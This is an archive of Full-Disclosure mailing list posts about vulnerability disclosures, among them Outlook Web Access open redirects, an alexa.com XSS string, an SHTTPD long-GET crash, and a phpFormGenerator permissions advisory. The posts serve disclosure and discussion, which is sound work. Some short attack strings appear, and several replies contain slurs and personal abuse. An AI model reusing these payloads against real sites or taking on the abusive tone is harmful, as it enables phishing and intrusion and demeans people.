Re: [Full-disclosure] MS OWA 2003 Redirection Vulnerability - [MSRC7368br]

[Morning Wood]

Discovered and reported 3 years ago

http://www.google.com/search?hl=enq=oaw+exploit+exploitlabs.com+

http://www.exploitlabs.com/files/advisories/EXPL-A-2005-001-owa.txt

http://seclists.org/fulldisclosure/2005/Feb/0101.html

http://forums.techarena.in/small-business-server/1006421.htm

 Microsoft Outlook Web Access owalogon.asp Redirection Weakness



http://secunia.com/advisories/14144/

- Original Message - 
From: Davide Del Vecchio [EMAIL PROTECTED]
To: [EMAIL PROTECTED]; full-disclosure@lists.grok.org.uk; 
[EMAIL PROTECTED]
Sent: Friday, October 17, 2008 12:07 PM
Subject: Re: [Full-disclosure] MS OWA 2003 Redirection Vulnerability - 
[MSRC7368br]


 Hi,

 I found and notified this vulnerability to Microsoft in date:

 Tue, 10 Apr 2007 15:40:13 +0200

 You read exactly, April 2007, 1 year and 6 months ago. :(

 The Microsoft Security Response Center opened the case ID MSRC 7368br.

 The bug has never been patched since 1 year and 6 months.
 I asked time to time for updates but they always answered me that the
 bug had to be patched with the next Service Pack and they did not have
 any ETA.

 This SP has still to be released.

 They told me that if I released the vulnerability prior to the official
 patch, I could not be officially credited for that. I tought it was not
 a critical vuln, and so I waited. Too much (?).

 I am a bit sorry for Microsoft, I think they lost an other chance since
 now I feel a bit tricked. I am not sure if the next time I will wait so
 much and I am not sure if I will suggest to anyone to wait for the
 patch. I just hope Microsoft will credit me in the official patch. :(

 Below you can find the first mail I wrote to MS regarding the issue.

 Best regards,

 Davide Del Vecchio.


 From: Davide Del Vecchio [EMAIL PROTECTED]
 To: [EMAIL PROTECTED]

 Subject: Microsoft Outlook Web Access redir.asp Redirection Weakness
 Date: Tue, 10 Apr 2007 15:40:13 +0200

 Hello,

 I found a weakness in Microsoft Outlook Web Access (OWA), which
 potentially can be exploited by malicious people to conduct phishing
 attacks.
 The weakness is caused due to a design error in the way OWA uses an
 unverified user supplied argument to redirect a user after successful
 authentication.
 This can e.g. be exploited by tricking a user into following a link from
 a HTML document to the trusted login page with a malicious url 
 parameter.
 After successful authentication, the user will be redirected to the
 untrusted (fake) site.

 The affected product is:
 Microsoft Outlook Web Access ( OWA )
 Windows 2003

 Examples:
 https://[owa-url]/exchweb/bin/redir.asp?URL=http://www.example.com

 this will take the user to http://www.example.com when the login box
 is pressed.

 https://[owa-url]/exchweb/bin/redir.asp?URL=http://www.example.com/setup.exe
 prompts the user to download an executable or other file.

 The attacker can then have a page to capture the user / password
 and redirect back to the original login page or some other form of
 phishing attack.

 Note that this vulnerability is very similar to the one affecting
 owalogin.asp described here:
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0420

 Best regards,

 Davide Del Vecchio.

 Martin Suess ha scritto:

 ...

 Timeline:
 -
 Vendor Status:  MSRC tracking case closed
 Vendor Notified:March 31st 2008
 Vendor Response:May 6th 2008
 Advisory Release:   October 15th 2008
 Patch available:- (vulnerability not high priority)


 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/
 

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Cross site scripting issues in s9y(CVE-2008-1386, CVE-2008-1387)

[Morning Wood]

SHUT THE FUCK UP!

From: n3td3v [EMAIL PROTECTED]



___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] on xss and its technical merit

[Morning Wood]

4. use xss to IFRAME or otherwise leverage a client exploit

imho this is by far worse than any of the other vectors mentioned

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Microsoft FTP Client Multiple Bufferoverflow Vulnerability

[Morning Wood]

im so hurt now... you make me feel so small compared to your great worx 
MrReepass
stfu kthnx


- Original Message - 
From: reepex [EMAIL PROTECTED]
To: Morning Wood [EMAIL PROTECTED]; 
full-disclosure@lists.grok.org.uk
Sent: Wednesday, December 12, 2007 9:01 PM
Subject: Re: [Full-disclosure] Microsoft FTP Client Multiple Bufferoverflow 
Vulnerability


 wow thats quite impressive.. you couldnt exploit a basic overflow and two
 years later someone else did

 you must be quite proud. Did you tell your family and co workers about 
 this
 great finding? I hear tipping point and idefense are hiring you should
 forward them this set of emails.

 On Dec 12, 2007 2:38 AM, Morning Wood [EMAIL PROTECTED] wrote:

 One of my first advisories and was rediscovered later, turned into a
 viable
 exploit 2 years after by another researcher.


 http://framework.metasploit.com/exploits/view/?refname=windows:ftp:netterm_netftpd_user


 http://metasploit.com:5/EXPLOITS?MODE=SELECTMODULE=%6e%65%74%74%65%72%6d%5f%6e%65%74%66%74%70%64%5f%75%73%65%72%5f%6f%76%65%72%66%6c%6f%77

 *hugz*


 - Original Message -
 From: reepex [EMAIL PROTECTED]
 To: Morning Wood [EMAIL PROTECTED];
 full-disclosure@lists.grok.org.uk
 Sent: Tuesday, December 11, 2007 1:58 PM
 Subject: Re: [Full-disclosure] Microsoft FTP Client Multiple
 Bufferoverflow
 Vulnerability


  are you serious?
 
 
 http://www.derkeiler.com/Mailing-Lists/securityfocus/bugtraq/2003-07/0259.html
 
  I guess you are a 'brain dead india wannabe sec researcher' also?
 
 
  On Dec 11, 2007 6:22 AM, Morning Wood [EMAIL PROTECTED] wrote:
 
  advisories like this are typical of brain dead India wannabe sec
  researchers
  nuff said
 
  ___
  Full-Disclosure - We believe in it.
  Charter: http://lists.grok.org.uk/full-disclosure-charter.html
  Hosted and sponsored by Secunia - http://secunia.com/
 
 

 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/

 

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Microsoft FTP Client Multiple Bufferoverflow Vulnerability

[Morning Wood]

basically i am saying i could care less, it was years ago, and i certaintly 
do not care about your gay antics at security cons or on this or any other 
public forum...

can you really not be any better than a worthless pile of gmail poop? or at 
least let everone see your great security worx... but i seriously doubt that 
will happen * kinda like n3td3v\s great security research / discoveries!

ciao

- Original Message - 
From: reepex [EMAIL PROTECTED]
To: Morning Wood [EMAIL PROTECTED]; 
full-disclosure@lists.grok.org.uk
Sent: Thursday, December 13, 2007 10:43 AM
Subject: Re: [Full-disclosure] Microsoft FTP Client Multiple Bufferoverflow 
Vulnerability


 so are you now admitting your vulnerability was worthless?

 On Dec 13, 2007 12:02 PM, Morning Wood [EMAIL PROTECTED] wrote:

 im so hurt now... you make me feel so small compared to your great worx
 MrReepass
 stfu kthnx


 - Original Message -
 From: reepex [EMAIL PROTECTED]
 To: Morning Wood [EMAIL PROTECTED];
 full-disclosure@lists.grok.org.uk
 Sent: Wednesday, December 12, 2007 9:01 PM
 Subject: Re: [Full-disclosure] Microsoft FTP Client Multiple
 Bufferoverflow
 Vulnerability


  wow thats quite impressive.. you couldnt exploit a basic overflow and
 two
  years later someone else did
 
  you must be quite proud. Did you tell your family and co workers about
  this
  great finding? I hear tipping point and idefense are hiring you should
  forward them this set of emails.
 
  On Dec 12, 2007 2:38 AM, Morning Wood [EMAIL PROTECTED] wrote:
 
  One of my first advisories and was rediscovered later, turned into a
  viable
  exploit 2 years after by another researcher.
 
 
 
 http://framework.metasploit.com/exploits/view/?refname=windows:ftp:netterm_netftpd_user
 
 
 
 http://metasploit.com:5/EXPLOITS?MODE=SELECTMODULE=%6e%65%74%74%65%72%6d%5f%6e%65%74%66%74%70%64%5f%75%73%65%72%5f%6f%76%65%72%66%6c%6f%77
 
  *hugz*
 
 
  - Original Message -
  From: reepex [EMAIL PROTECTED]
  To: Morning Wood [EMAIL PROTECTED];
  full-disclosure@lists.grok.org.uk
  Sent: Tuesday, December 11, 2007 1:58 PM
  Subject: Re: [Full-disclosure] Microsoft FTP Client Multiple
  Bufferoverflow
  Vulnerability
 
 
   are you serious?
  
  
 
 http://www.derkeiler.com/Mailing-Lists/securityfocus/bugtraq/2003-07/0259.html
  
   I guess you are a 'brain dead india wannabe sec researcher' also?
  
  
   On Dec 11, 2007 6:22 AM, Morning Wood [EMAIL PROTECTED] 
   wrote:
  
   advisories like this are typical of brain dead India wannabe sec
   researchers
   nuff said
  
   ___
   Full-Disclosure - We believe in it.
   Charter: http://lists.grok.org.uk/full-disclosure-charter.html
   Hosted and sponsored by Secunia - http://secunia.com/
  
  
 
  ___
  Full-Disclosure - We believe in it.
  Charter: http://lists.grok.org.uk/full-disclosure-charter.html
  Hosted and sponsored by Secunia - http://secunia.com/
 
 

 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/

 

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Microsoft FTP Client Multiple Bufferoverflow Vulnerability

[Morning Wood]

One of my first advisories and was rediscovered later, turned into a viable 
exploit 2 years after by another researcher.

http://framework.metasploit.com/exploits/view/?refname=windows:ftp:netterm_netftpd_user

http://metasploit.com:5/EXPLOITS?MODE=SELECTMODULE=%6e%65%74%74%65%72%6d%5f%6e%65%74%66%74%70%64%5f%75%73%65%72%5f%6f%76%65%72%66%6c%6f%77

*hugz*


- Original Message - 
From: reepex [EMAIL PROTECTED]
To: Morning Wood [EMAIL PROTECTED]; 
full-disclosure@lists.grok.org.uk
Sent: Tuesday, December 11, 2007 1:58 PM
Subject: Re: [Full-disclosure] Microsoft FTP Client Multiple Bufferoverflow 
Vulnerability


 are you serious?

 http://www.derkeiler.com/Mailing-Lists/securityfocus/bugtraq/2003-07/0259.html

 I guess you are a 'brain dead india wannabe sec researcher' also?


 On Dec 11, 2007 6:22 AM, Morning Wood [EMAIL PROTECTED] wrote:

 advisories like this are typical of brain dead India wannabe sec
 researchers
 nuff said

 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/

 

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Microsoft FTP Client Multiple Bufferoverflow Vulnerability

[Morning Wood]

advisories like this are typical of brain dead India wannabe sec researchers
nuff said

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] RIPA powers being used

[Morning Wood]

- Original Message - 
From: James Rankin [EMAIL PROTECTED]
To: full-disclosure@lists.grok.org.uk
Sent: Tuesday, November 20, 2007 3:46 AM
Subject: [Full-disclosure] RIPA powers being used


 RIPA is finally being used to force people to hand over encryption keys...

 http://news.bbc.co.uk/1/hi/technology/7102180.stm

omg wtf...

In the event that there was doubt that a suspect did not possess a key, he 
said, it was up to the prosecution to demonstrate beyond a reasonable doubt 
that they could know the passphrase



ever fat finger a password? ever forgot a password? ( I got a zip archive I 
protected and cant unlock due to the fact I forgot the passphrase )

looks like prosecuters and judges will now be ASSUMING guilt or innocence 
based on whaty they THINK MIGHT be true. ( if you created the passphrase you 
must know it )

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] IDS logs showing outgoing packets on port 80

[Morning Wood]

Skype?

- Original Message - 
From: Kelly Robinson [EMAIL PROTECTED]
To: full-disclosure@lists.grok.org.uk
Sent: Saturday, November 03, 2007 3:20 PM
Subject: [Full-disclosure] IDS logs showing outgoing packets on port 80


 In our IDS logs, I notice many outgoing packets coming from port 80 
 (HTTP).
 These packets are coming from client PCs. What may be happening?






 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/ 

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] MySpace URL redirection

[Morning Wood]

 warning: will crash Internet Exploder.

 http://profile.myspace.com/index.cfm?fuseaction=cms.goto_i=176efaa7-1908-488e-aa3e-2565dcf843d6_u=http://www.modernlifeisrubbish.co.uk/etc/crash-ie.html

redirection yes, crash no ( IE7 ) crash yes ( IE6 )

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] pdp architect, drraid, beastiality, and incest

[Morning Wood]

 Do you understand the concept of protecting people and corporations from
 total idiots trying to gain access to their systems?PDP just lets others
 know what he found,while the offending company is working on a fix,in a
 minimal way.
 
 If you were a true researcher,you should be able to find the same with
 the clues he provides.Yay for PDP not feeding script kiddies!
 

dunno but every sec researcher I know in the private sector would never
release any info without it being fully authorized by his / her employer.

Possibly we will see these idiots looking for a new job soon?

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] are the NetBIOS-like hacking days over? -wide open citrix services on critical domains

[Morning Wood]

Netbios is quite fun over Hamachi

Subject: Re: [Full-disclosure] are the NetBIOS-like hacking days over?

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Testing DidTheyReadIt.com

[Morning Wood]

Outlook Express blocks this by default, unless you click
the show images dialog thingie

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Symantec Contact?

[Morning Wood]

 What's really Sad is that Symantec does not have an option for the
 general public (i.e. Independent Virus Researchers) to submit virus
 samples .
 
 You have to either
 A. Submit it through their product.
 B. Have a Corporate Support contract.
 
 Guess they don't want new samples.

agree 100%, stupidity

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] intrusion kit

[Morning Wood]

What I'm looking for is an intrusion kit, a ZIP file that contains
 common tools like: vnc, nmap, pwdump, ssh client, etc. That have all
 dependencies in the zip file, so I could do:

 unzip kit.zip
 cd nmap
 nmap -sS localhost
 cd ..
 cd vnc
 run-vnc-server


i guess your so talented in breaking into boxen that you cant simply
make your own SFX to do what you want.

btw: i seriously doubt anyone will help you ( or you buy the ebay offered 
one LOL...
 have fun getting yourelf pwnt )

byez,
MW 

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Turkish hackers bring down insurer's site

[Morning Wood]

 http://www.smh.com.au/news/web/turkish-hackers-bring-down-insurers-site/2007/07/20/118455284.html

its a defacement so what? Done by Turkish skriptkidz, with kidiescriptz no 
less ( you can bet the pharm there was no data or customer information 
leaked... )

move along... ( nothing to see here ) 

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Persistent XSS and CSRF and on networkappliance

[Morning Wood]

 For the love of god people can we stop with the hashing already?

hmm... i like hash ( and cake )
can we have a Month of Hash Cakes?

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] You shady bastards.

[Morning Wood]

 yeah, lets reply the more we can!!!

I like cake.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Yahoo 0day ActiveX Webcam Exploit

[Morning Wood]

cannot reproduce..

yahoo IM versions
6.0.0.1922
8.1.0.249

 DCE2F8B1-A520-11D4-8FD0-00D0B7730277
ywcupl.dll
versions 2.0.1.2 and 2.0.1.4


9D39223E-AE8E-11D4-8FD3-00D0B7730277
ywcvwr.dll
versions 2.0.1.3 and 2.0.1.4

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] 0day Yahoo Webcam Exploits

[Morning Wood]

 Corrected and working:
   
  I am very sorry! Please check again
   
  Exploit #1
   

new versions:
9D39223E-AE8E-11D4-8FD3-00D0B7730277
success yahoo version 8.1.0.249

  Exploit #2:

no success ( black box in IE )


1 for 2 come on danny!!!

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] 0day Yahoo Webcam Exploits

[Morning Wood]

   
  Exploit #2:

working now..

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] alexa.com XSS

[Morning Wood]

 http://thumbnails.alexa.com/update_thumbnail?url=%3Cscript%3Ealert(%22alexa%20sucks%22)%3C/script%3E

 is there more to say?

Thank you, The thumbnail image for scriptalert(alexa sucks)/script 
will be updated within 48 hours 

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] iDEFENSE VCP Challenge and botnet technologies

[Morning Wood]

 A crack commando lead by Gandhi (who showed up in
 boxing gloves and elastic pants) managed to destroy an Iranian
 building complex used to conduct Denial of Service attacks against
 str0ke's private IRC intelligence service.

 But how did he destroy the building is the real question?

 /str0ke

 Gandhi has been known to be secretly developing a bot intra transformation 
chromatifier, or
BITCh, for short. This appears to actualy harness the power of teh bots DoS 
functions, via a
fiber optic link to power a wave disruptor, being co developed by MI6. 
Digging further,
reports are that an engineer by the aformentioned code name v3dt3n has 
been a major
player in this.  This is all the info I can find for now...

hope it helps,
M.Wood 

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Spam is funny!

[Morning Wood]

 Anyone else seeing this trend? I'd be curious especially to see whether
 or not they're targeting folks in non-IT roles. For example, do we
 have any veterinarians on the list who get stock spam with subjects
 related to animal husbandry?

yup, lots of odd topics, in particular they do appear to come from mailman
lists where you have subscribed, I get spam subjects and body content from
what appears to be recently discussed topics, although only security 
security
lists. ( and yes, universaly they are penny stock dump spam )

mw 

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Why Microsoft should make windows open source

[Morning Wood]

 M$ will never let us h4x0rz into their source (willingly) but I agree
 with you James, the open source paradigm has regularly outpaced M$ and
 many other large corporate software producers where it comes to
 addressing bugs, security holes, and in many cases feature requests.

 Who knows... mabey they will get smart. IMHO M$ should, and could,
release an opensource OS.

 OpenWin , WindOS, call it whatever.
 Release a small basic win32 platform ( kernel / window / desktop / 
explorer ), that could
leverage existing development tools, to allow the comunity to provide 
extensible
applications that readily conform to existing, public API's. Provided with 
runtime
libraries already available in todays applications, the underpinning would 
support
existing win32 applications.

 Packaged with win32 / cygwin versions of POSIX tools, perl, php and python, 
it
would be a very robust, basic OS.

( reactOS + freeDOS ? )

 Ooops... I forgot... this is Micro$oft I was talking about

..what we need is another Linus Torvalds to build and release a newcode 
win32 compliant
kernel / base that uses

anyway,
M.W





___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow

[Morning Wood]

 Fuck you too.
 
 Larry Seltzer
 eWEEK.com Security Center Editor

cool  Ziff-Davis lets you curse online.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] CA BrightStor ARCserve Backup Mediasvr.exevulnerability

[Morning Wood]

 If you discover a vulnerability in CA products, please report
 your findings to vuln at ca dot com, or utilize our Submit a
 Vulnerability form at
 http://www3.ca.com/securityadvisor/vulninfo/submit.aspx.

Looks like a vuln is found once a week in C.A products
esp in you Backup and Anti-Viri products.

3 are listed currently on your own page
http://www3.ca.com/securityadvisor/vulninfo/

and um...
http://www3.ca.com/securityadvisor/vulninfo/search.aspx?mode=tmcpst=computer%20associates;


tired of seeing C.A. exploits!!!
especially the corporate products,

 your clients must thank you for providing remote access in EVERY PROGRAM 
YOU RELEASE
( i know the blackhats do )
please delete these products from your catalog.
m.w


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Xbox live account stolen.

[Morning Wood]

 Here is my current update on the situation.

 http://www.digitalmunition.com/StolenUpdate.html

 It would seem to me that MS / Bungie could simply cross reference
the pretexed accounts to the IP address logged in from, following the 
reporting
of a compromised account. If it is a rather small group perpetrating this, 
and
it appears to be, one would think investigators could track this fairly 
easily???

 XBOX Live accounts are purchased, and have monetary value.
 I am sure once word got out that these pretexters were being arrested for 
theft, incidents
would drop fairly rapidly...  PH34R T3H XB0X P0L1C3 !!!

my $0.02,
m.w 

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] shttpd long get request vuln ( retro )

[Morning Wood]

see attatched retro advisory

  - EXPL-A-2006-005 exploitlabs.com Retro Advisory 002 -

 - SHTTPD -







AFFECTED PRODUCTS
=
SHTTPD  v1.34
http://shttpd.sourceforge.net/



OVERVIEW

SHTTPD is a lightweight web server. The main design
goals are the ease of use  and the ability to embed.
Ideal for personal use, web-based software demos 
(like PHP, Perl etc), quick file sharing.

A care has been taken to make the code secure



RETRO-RELEASE DATE:
===
Oct 10, 2005

Duplicate Release: Oct 06, 2006 
by: sk0de

http://secunia.com/advisories/22294/



DETAILS
===
SHTTPD is vulnerable to an overly long GET request.



SOLUTION

patch: Upgrade to v1.35



PROOF OF CONCEPT

1.start SHTTPD

2.send an overly long GET request

http://[host]/Ax274 chars ( v1.27 - v1.30 )
http://[host]/Ax256 chars ( v1.34 )
v1.31-v1.33 untested

2a.
PoC by Sk0de
http://www.milw0rm.com/exploits/2482



CREDITS
===
sk0de - http://secunia.com/advisories/22294/ 



RETRO-CREDITS
=
This vulnerability was discovered and researched by 
Donnie Werner of Exploitlabs. At the original time

of discovery and retro-release date, the author was
not aware of any other advisories or research by 3rd parties.


Donnie Werner
[EMAIL PROTECTED]
[EMAIL PROTECTED]

--
web:http://exploitlabs.com

http://exploitlabs.com/files/advisories/EXPL-A-2006-005-shttpd.txt___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Googling:Google Meta Bugs

[Morning Wood]

well... there is always this for fun... if you feel the need
 to...

http://www.google.com/search?hl=enlr=safe=offq=%E2%96%84%E2%96%84%E2%96%88%E2%96%80%E2%96%80+%E2%96%88%E2%96%AC%E2%96%88+%E2%96%88+%E2%96%80%E2%96%88%E2%96%80

dosvidanya,
mw 

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] non-tech: defcon and FD. :)

[Morning Wood]

So, at defcon, one of the evenings, at one of the tables... several 
people

sat. Some of them were decent and therefore shall remain nameless. When
introductions were made, we realized that

The others were:
Morning_Wood, the bantown fa*ot spammer, and me.

We have a picture together, morning, how about uploading it somewhere?


http://exploitlabs.com/gadi-scares-me.jpg



Morning_Wood was surprisingly a cool guy, as well... but I think he is a
bit scared of me now that we met. :P


what me scared???. LOL, your like a TEDDY BEAR!



n3td3v spunked:
Morning Wood's mother has just died, I don't think this is the time to 
poke

fun... I could be wrong though ;)


at least I had one that loved life until her unexpected and untimely death, 
unlike your mum that drinks and turns tricks for the construction blokes 
down the lane for a hit off the crack pipe... eh mate? now shove off wanker!


mw


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Yahoo messenger serious bug

[Morning Wood]

I have a private PoC for this now for a few months, it does work ( although 
the PoC is slightly different and only requires one msg string to be sent ).


cheers,
MW 


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Debian Development Machine Gluck Hacked - UPDATE

[Morning Wood]

Debian Development Machine Hacked
http://lists.debian.org/debian-devel-announce/2006/07/msg3.html
or
http://www.zone-h.org/content/view/13853/31/


Confirmed hacked by:
Linux Kernel PRCTL Core Dump Handling Privilege Escalation Vulnerability

http://www.debian.org/News/2006/20060713

or

http://www.zone-h.org/content/view/13853/31/  ( updated )

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Debian Development Machine Gluck Hacked -UPDATE

[Morning Wood]

David Taylor wrote:
Curious why Secunia is rating this as 'less critical'.  The way I see it,
this exploit could be integrated into the other exploits for mambo, 
joomla,

phpbb, etc.  Also, all of us that have websites hosted on linux machines
that have a vulnerable kernel could get root?

I'm thinking 'highly critical'?


considering the widespread use of that kernel,
yes

and yes, viable user=root exploit can be obtained from a web app vuln. ( 
hacking 101 here kids ) 


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Debian Development Machine Gluck Hacked

[Morning Wood]

Debian Development Machine Hacked
http://lists.debian.org/debian-devel-announce/2006/07/msg3.html
or
http://www.zone-h.org/content/view/13853/31/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Yahoo IM spoofing

[Morning Wood]

Describe the IM a little further.

Receiving garbage in an IM message isn't new, and is commonly sent to
everyone in a chat room via a chat-bot. The IM commonly contains URL
hyperlinks to either a gambling site, or a porn site [webcam,dating,etc].



the person who sends you the IM is YOU



___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] 70 million computers are using Windows 98 rightnow

[Morning Wood]

Windows 98 has no remote exploits, only client side attacks ( IE, OE, WMP 
and 3rd party apps )
( try sticking a win98 box in a dmz or direct to the Internet... It wont get 
owned ). I dont think it is that huge of an issue that they are abandoning 
it's users.


The impending abandonment of support for Win98 has been comming for at 
least 2 years

http://www.microsoft.com/windows/lifecycle/default.mspx
http://www.internetnews.com/dev-news/article.php/3298741

As a matter of fact I have a Win98 box just for a game ( Descent2 on 3dfx 
!!! ) and my TV tuner.


Replace IE and OE with open source replacements, and the platform could be a 
low cost alternative that would also carry a fair degree of security for 
those that would like to deploy it.


One suggestion to Microsoft would be to make Win98 ( and Dos 6.2x ) 
available as a freeware OS since they will no longer be burdened by support, 
patches and etc anyway. Replace IE and OE with open source replacements, and 
the platform could be a low cost alternative that would also carry a fair 
degree of security for those that would like to deploy it.


They could even open up some source code that is not used by the currently 
supported OS's, that could bring a good deal of support and development by 
the community.


my2bits,
MW



___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] phpFormGenerator

[Morning Wood]

 - EXPL-A-2006-004 exploitlabs.com Advisory 049 -
   - phpFormGenerator -




AFFECTED PRODUCTS
=
phpFormGenerator  v2.09
http://phpformgen.sourceforge.net/


OVERVIEW

phpFormGenerator is an easy-to-use tool to create reliable 
and efficient web forms in a snap. No programming of any 
sort is required. Just follow along the phpFormGenerator 
wizard and at the end, you will have a fully functional web 
form!


note:
as stated by the vendor this script is widely used with cPanel
and other hosting provider solutions.



DETAILS
===
phpFormGenerator by default installs all directories
as chmod 777 and will not function if they are not set as such.

in the readme:
3. Set read+write+execute file permissions on the 'forms'
directory and *everything* inside it 
(including all subdirectories and files)


UNIX:
chmod -R 777 forms

in process2.php:
please make sure that the forms directory (and everything in it)
has read+write access. you can achieve this by issuing the following
command on linux/unix:
chmod -R 777 forms


researcher note:
when the applications directories are not set 777 the app errors with:


File and Directory permissions 
The forms directory is not writeable.

The forms/admin directory is not writeable.
The use directory is not writeable.
Please give read+write permissions to all the files
and directories mentioned above. Refresh this page
after you have done so.


SOLUTION

vendor contact:
Musawir Ali [EMAIL PROTECTED] June 30, 2006

patch: none ( see vendor response )


VENDOR RESPONSE
===
there are no security flaws ... if you had taken a moment to think,
you would realize that a a major software company such as cPanel would
not be shipping phpFormGenerator with their scripts if it had flaws.
In any case, the program has been thoroughly tested by myself and
other security experts and is not known to have any issues.

777 is never forced, the suggested method is to give write permissions
to the group the process belongs to.
upload function is insecure. arbitrary php functions are insecure...
could you be any more vague? You seem to be one of those ignorant
nuts who shout slogans like windows sucks linux owns your server
is insecure without realizing the garbage spooling out of your mouth.

